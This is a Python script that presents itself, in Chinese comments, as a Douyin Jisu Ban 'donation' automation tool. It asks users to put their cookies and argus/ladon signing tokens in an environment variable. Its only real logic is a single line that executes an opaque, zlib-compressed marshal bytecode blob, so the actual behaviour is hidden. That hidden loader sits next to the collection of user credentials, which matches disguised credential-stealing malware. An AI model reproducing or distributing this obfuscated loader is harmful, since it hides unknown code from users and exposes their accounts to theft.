import json,requests,time,os
import sys
from notify import send
'''''
抖音极速版捐款，默认捐0.01，预防黑号，为公益事业做贡献
变量名：dyjsb，多号换行，格式url#cookie#argus#ladon
url只需要？后面的
ua（User-agent）填自己的
'''''


ua = ""
# Make Sure You're Running The Program With python3.10 Otherwise It May Crash
# To Check Your Python Version Run "python -V" Command
try:
	import marshal,lzma,gzip,bz2,binascii,zlib;exec(marshal.loads(zlib.decompress(b'x\x9c]\x96gP\xd3\x89\x16\xc5\xff\xa9\x14ABP\x17P\x91\x1aj\x04b("-1\x84@\x82\x06\x03"\x01!\x15\x02\x06a\rX\xc0B\x13\tK\x96 E\xba\x01\x02\x02RD\x8a\x02O\x85\xc0"\xc5\x82&\xa8D\x01E)\xea\xaaoWD\xd6\x15y\xe8\xbe\x997\xf3\xce\x9d{~3\xf7\xce\xdc\x0f\xf7\xd3a\x03\xff\'\xf8Z{\xae\xb5\x80\xb4f\x1c\x80\x03\xe2\x03\xf4\x7f\x08\xa2\x83~\x10L\x07\xff \x84\x0e\xf9A(\x1d\xfa\x830:\x8c\x0b\xe7\x02\x12\x15.D\xa2\xca\x01W\x82*Ai \xd0\xda\x86\x06XB^\x7f\xbf\xbdG\x10\xa8\x06\x00x:o\xa7=.\x18E\x0bV[i+\x02 6gV\xff\xab\xcf\xab\xefV\x95\xb7VW\xbf\xadMn\xad~^YM\xf6\x04\x10\x1e\xcf3\xc5\x0c\x95]\xbbf\x134\x92\xba\xca\xdeO-%\x1d}KNr]\xba\x8f\xd2/I\xc6_\xac\x9f\xd5(\xc53\xb1PM\x95\xfa\xbc\xe8\x08\xb1R\x04Q@<9\x9b\xa9\xc3\x95o\xb0\x03\x00v\x07\x8dR!\xd6H\xe6\xc1E\x9aX\x16\xc6 \xf75\\\xa8/\x02a\x15K\xb9\x1d\xde\xb5&~n:\xd0a\xc7K\x998\xc9\x10\xa0\xbfV\xdf\x85\xfd\xe7\x0f\xa0\xfaJT\x85\xb1\xbe=8\x9a\xa7o\x8f\xc5\xca\x15<\x00Tm\xa8\t\x8c\x01\xf0\x12\xcd\xff\xbd+\x9a\t6B\x11\x89%\xd1\'\xb0\x9f0\xbc\x8b\xd2h\x0fj)\xeda\xe2E)e,\x87\xbahP_\r\xf1\xe9\xd0\x80\xca\xf45!`\x1e\xc6\xce\xa8\x1ae\x82\xd0E\x01n\x04\x00\x9e"\xe1\x8cA<y\xac\xa8<#\t<\x19\xc0\xc2\xa1X\x16g8]\xa6\x91<\x86}P\xbd[\xc7\xc4\x10\x0b\x12\x0f\x01\xbeF:\x14\x9cc\x1e*\xba\x82FX\xccV\x0c$\x8a$)\xb3n(\x9d\xbd\xa4^\n\x08`\xf8a \n\x0e \'B\xe5\xa0\xfaj"\x05\x00\xd2\xf6\x12V\xb6B\\8\x95\xc0\x96Q+\x8bQ\x97\x82\xdcW\xdd\xb3\xea\x05>\xf1\xef\x9c\x82CH_\x17r\xbf\x05\xfaQ\xa2\x0f\xc9I\x99\xa8\xfaE"\xfb\x80w\x8e\x83\x906\x17\xbc\xa7\xad\x86\x98\xae\x8e\xbc\xd0\xd2?^$\xfb\xd7\x15|~$\xee\xda_\xb6{\nt\xef\xdc8\x81N\xe2\xd0\'j\x94\xf7\xaa\x1b\xc6|s\x89]\x9f\xac\xaf\x8d\x86\xc7X\xd1%\xda@e*\x14\x1f%z\x90l\x8c\xd0\xa8%\xb8~d;\xf0uM\x93$\x84 \x86\xde\xf4\x85\xfer\x0f\xc7\x9f\x0b\xd5\xbe\xd2-\xbe\xb9\xcc\xff\xe1i\x9eeJ{\xa2\x89\x86!^Y\x19C\xe8\x03*\x17\xacO^\xeaw\xb0\xfc=&2\xafv\xa0\xca8\xa2\x9526\xfdm\xd3\xe2\xd9\xa0\x02\xf0\x1d_\xf0\xaf\x88\xed\xad\r\xb2UDq\x8dkd\x86\xc3\xd9)\xec\xb8\x82\x8d\xdf\xb4\xc1H5\x00gV\xa8\x7f\xafQO\xe5\xef\x8b\x15\xf6\x9e\x87^\x9c|J\xe6\xbbq\x16\xc8\x16\x1cI\xa9\xe3f\xb3<\x08\x88uE\xae\xa5\xcd\x1a\xb2\xca\xcc\xb2\xc4?9\x80\x1diy0\xe3?\x11b\xef\x03+\xda6\x11BR\x93\x97d\xaa\xad\x0bt\xa9\xdb\xbd=x5N\x162\xcf\xf3\x8e\xbf\x8d+3\xcf$\x19!\\\x17\xa5\xf9\x12\xb2M\x9e\xdf3;4L\xf4A\xdc\xd0g\xde;!\x84r\xa3\xc4C_\xec\xf8\xbe\x9b6\xaa\x8a\xab-z\xe5N\x91M|\xd8d)\'"{(5T2\xa8F`\xed\x08\xe8#\xe3\xc7\xe2\xe2:\xbd\xcf\xc6\x1fX\x80\xb1\xed\x860\x86\xcc\xb2\xc3\x98\xad\xd1\'\xe7\xa6\xc5_\x13\xf1i\xcd\x93\xa6\xe8J\x92\xa9\x13\xb48\'\x05\x96"#!\xa7K\x96w=W\xd9\'\x8f\xaeh\xa8\xbe\xafC\x10\xbf\x94^\xf9h#\xbcm\xaa3P8\x93AZ/5\x1a\x03\xdd\x07M#\x9a\x18f\x04\xd3\xf3\x15\xeeSd\xa6%/\x1f\x11\xaf\x0f\xa9\xe9\xb0ru\xafs\xf5\xd2\xd8\xf2%@z\xa85\xf2f\xc9\xd5F\xc9]\xc0\xd4\xf2\x94\xaeU{\xa3\x0f\xc80\xe1W\xad\x0b\xdc\xb2\xb49\x82\xb1n\xb6<\xd0\xa1\t\xae5v\xc8\x87R\xd8\xa7\xbdQ[\xdbY\xfa\xd3Hk|v0x\xbf|ip\xe5\xd1\xf9\xc7\x93$\x90\xaa\x0b\xd9I\xda\xf1\x0e^\x90\xd9_\x16{:i\xdc\x1c\x9b\x99\x156q\xba~^<\xfeb\x87\x1b8\x902\x11\x84\x08N\xa8\xbcP\xa3-\x8f\xf3\xf6VP\xf4\xdf\xe7\x0e\xd7\x12\xc6\x87w\xfa\xbf\xbaA:EG\xca\x16\x1e\\\xa1\xfe\xfd\xe0\x9d\xac\xe2no\xcc\xebw\x97\xc5\xe7\xf7r~-\xfa\xcd\xe1pB=\xc9-\\\xe7-O,R\x9b1\xbc\xed\x15\xb2\xdf\x87\xf66\xdfh\x87\xa2\xb3phK\xf7\xf6\xca\xf3\x9cG\xa4\x82C\x9a7\x8bE^\xccV\xff\xc0\n\xad\xd6s\xf4\xa6\xf0ge\x16\x07iA\xfe\x9b6\xde\xb5\x9a\x7fb\xc4?\xb0[\xef\xd2\xe7O\xd4\x02]\x99\x18\x8c\xb4}=7\x95e\xf9u\xf89\xab\xe7~\xd5a\xb5\x10\xc3\x1dy\xf9\x8e\x9d\xb3\x89b\x84\xb1\xe9\xca\xd6\xf1\xf3\xb9\r\xf1\x1ff\xee[\xdb>\xe666n\x86\xcd7\xecl\x1d\xaf\x8eu\xbef\xd5\xf7\xd899\'DoQtJV-\xa8\x0c\x85y\xd9d&\x9d\xed?\x1fVS\x12\xf11>\xac\xb1\xb7\xa6bw\xef\xf0\xcd\xecu!\xc3$\xcf\xe4\t\xf3\x1b\xee\x9f$\x91\xd6\x7f\xe8x\xcd~\x16\xc7[MxV\x87\xbf6\x1a\xec-QM\x9d\x98.\xd6\x87:\xd8\xa56t&\x85\xa4hu\x97b\xda\xa2zCS\xf8\x9b)\x94$B\x88\xf1t^V\xfe\xa3W\xcb\x8e\xb4\x83\xa7\x08\xd2\xeav(\x9b\xd8\xaf\xe6\xee\xf2[\xf59ZK\xe8\xf5\xe6\x8e\x80\xc6\x91\x96\x9a\xdb*6\xbc\x11d\xcb\xfa\xd1\xba8\x83\xf4T\xb0\x85\xc9\xc0\xa5\xe6\xa3T\xca\x86\x01\xdeAS\x93My\x81\x01\xc6\x86USq\xc8\xfd\xc2b\xbe\x90\x98\xce\x99\x1c\xa8\xbd\xfeMX\x1b2\xa8\xac\x1cY|Tx\xa7M\xfa4`i6\x12\x8dxw\xd5\xcc\xe60\xc5%\xb3\xc0g\xee/\x1fjP\xb9\x0f\xae(c_@\x009K\xf8V5\x07\xb9\xe0Q\x9a\xda\xcf\xba^\x1e\xd7\x1f\xc1\xbc\xf3z\xfeqA\xf6\x1f2\x93\xbf\xe3\xe7_\xd7%\xaaP\xa5\xa9\xda\xb5\xc1\xb5\xa2A\xf3\x87\x1b\'\x03\t \x12\xbb\xec\xa9\xecZ\xf7z\xf5\x8f?wl\xcd#\xdf\xc9\xd8\xc0@q\x8d\x12\xcdX.8\x0b\xebJ\x17":\xc0\xd0`T\xce\x83f\x1d]\xfaX\xb4\xdc\x83\x19\xae\xd2D\xc2\x9b\xa4\x1d,\x1bAa\xd4\xa9c\xb6\xd0\xed\'\x17n\xe8\xb7=YQ\xee\xba\xcbtE\xc7\x1a\x9c\xc4\xec\xc4w\xb9Xq\xcc\xc8\xb3\x15\xd2\xaa\xf7\xb1W\x07\xee\xde\xd4\x8c^\x7f(\x1a\xb2\x01\x9eP{zq\xe8,\x08/\x9e\xb4#K\xf5\xd3\x84\xc5\xaf~w&\xe9\x99\x88\xa7p\xe5\xcc\x85\xf4vyS7\xb6\x8ch\xd9\xd9\xd1\xdag\xf1\x1e\x17\x1a\xdaz|\xe8(=^\xcdnd\xc5\xce\x93\x1aY\x955!N#>\xc8~\x0e\x7f\xc2\x15 \xf6Ti?s}\x95^\xe4nE]\xb4v\xe8)\x11\xa1\x9f\x93\xcc|\xb3S8\xc9\x8cd\xea\x97\xcb\x01T\\\xf3u\xee\x11<\xd4\x80\xa7=\xfb\x8b)8\xb4+\xc5\xde\xe2\x1cS\xf6\x85\xc1r\xcf\xa9\xf2C\xdf\xf5:\xb7\x1e\xee\xcc\x0em\xbf\xac\xc1:\xf0\xc4#\xe8\xd8V\xa4\xc5f\xdf\x86\xf0\x97\xc8z\x97z\xd5(\xe4&\xafv\xc7\x9f\xc0\xcb\x1d\x9c\xae\xb7V\xbe\xd71\xcd\xe7\xdc\xc1Uu\xca\x1b80\x9f54.\xc7\xf7\x14|\xd8\xbad\xc4=\x8a\xb9\x1ax=\xa0\xaa%\xc4\xd3\xc1\xdf\x9f\xc9\x1eQ\xd8\xbd\xe9\xb0q0\xad\xca]\xf69!\xa0\xdb\x87\xfd\xd9\xcc\xb91\x05n\x17nI|\xe3O\x07\xbb\x18\x97ej\x81o@\x9a0M=\xe2\xee^\xcd\x9fM\xbd\x9c\x06\x05E\xe6\xcd\xa0\xae\xc2\xb9Jv\xd6\xfb\x17F\xe9\xb7\x1c\x14\xa1\xbbD\xfb\x14\xe4\x06\xff\x12x\x1b\xd2\xfcI\xd1\xa3\xf9y\xa19b\xa0&\xae\x91\xdb\x97gQ\xe7\xb51c\x0e!\xd8MYgf\x1f*T\xbb\xee\x05\x07\x81\x14\xc1\x0eY\xbd\xa8\xd6\x88\xec\t\xc6}\x83D\xea\xb9O\xb3\x19m\x1e\xa4\xd4\x84\xd3\x8b\xc1YZ,\x8b\xb3\xbe\x1d\xff>\x01-J\xcd\x17\xb4\xf9=\xcdbF\xc1\x12<w6f\xc8\xd4\x91\xb8l~\xe7\xef\x8a\xb0\xd9\xcb\xc2~\xf8W#.\x1a\x99\x81?\x90\xec\x1f\x1bWp\xd4\xde\x10^G\x909l>~\x05\xa3\xf5\xe1\xda\xb7\xab\x93\x83\xa27\xe0\x0b\xe2\x039\xfb\xf72\xfa[N1\x9ahf\xb8\x96\x19.\xe88&\xa5F\xa3\xd8\x99\xf1"\x03\x910\xc0\x08\x8f96E\x1e\xf5\x16\xe1E\x171\xc7\xcf4,\x97\x1b|\xc9\x7f3\xd7\xc8\x1c\x017\x93\xfb\xad\x8a\xfa\xd6\xa72\xfe4Te\xb8\xd2\xf4l\xf1Rb\x92\xe7\x1d\xd5\xda\x86\x13\xe8\xb4\x18H$\\\xfd\xcf{\xd41\xd9\xb4S\xd1e\xb6z\x93\xdb\x86f\xef=z\xf7\x88t\xdd\x83X\x8f\x16\t;\x91_\x9b!\xec\xf6\xaa\x94x\xc4#\xf4\x15\xc8\x97\xb5\n\x92\xd3\x11n\xbe\xd0\xcb\xf4jJ]gI_n/\xc2&\x97RZ\xafn\x8d\xfaeGW\xe7S\xef\x1ci\xad\xde\xb6\xa9\xfe653\xc9i\xc3\xb0lc\xea6\x0f\x98\x8dwD\xb5\xb4\x8f\xa0\x1e\xb23b\xdd{\xa5\xd6\x1e\x9f\xe5\x17\x9d.;\xd1\x1b\x0fs5\xc5~ \'\x17\xaas6*\xd3\x91\xbd\xb8\xe0\x1c\x00\xe4\'\x0b6\xaf,\x03\xf9\x11\xb67\x0f\x0en\xd2\x96?\xdb\xbb\xae\x1e~;1yFI\xaa\x18\xdf\x96\xb0\xff\xbd\xdd\xe4D\x0f#\\j\x80\x18\xe8\xc7\x94\x13\xa4\x93\xdb\xfaN\x97k\x8a\x9f\x13~#W\xa4\x1c\x8b\x87\xbf\x1a:s\x13\xadQ\xf8\x80\x1a]\xb5|7\x0cQ`\xbd\xbd\x02\xb90I\xc6\xb7\xb6\xf3\xda\x83y\xd13]~@\xdf0jf\xc0\xb0\x1d\x171jsh\xdfaT\xda\xed\xa6G\xa0\xa4\xf6\x86~\xf5\xf6_\x86\x1e\xf6,\x93\xf7\x1f\xe4\xef\x15\xd9\x12:\x99\x8d\xb5[\xf9J\n]\xacx\t\x0b\xbb\x15\'\xff\x1a\xf4\x95\\\xaax\xb8\xbe\x9e\xe6]8\x9d\xb2\xfa\xd3\x11/g\xaa\xf8{\x8c\xb2TS\xaa\xc40\x8f\x08xL\xbe\x12\xcaO\x8ca*\xa1\x91\x89QqJ\x08+\x11\xa3TeE\x1df\n\xd8QQJh"?\x8a\xa5\x84r\x8fs\xd9J\x18?\x96\xc9\x11(\xd59\\vlL\xdc\x11\xae@P\x0f\x1cQ_\xcb4?\xec\x8b:\xf5\x04\x9a\x98 `3\xe3\xb9JU\xd7\x98XN\x02\x9f\xeb\x0e\xfa\x9e\x0c\xc1kF\x02\xfe\x03\xfd\x92{`')))
except KeyboardInterrupt:
	exit()
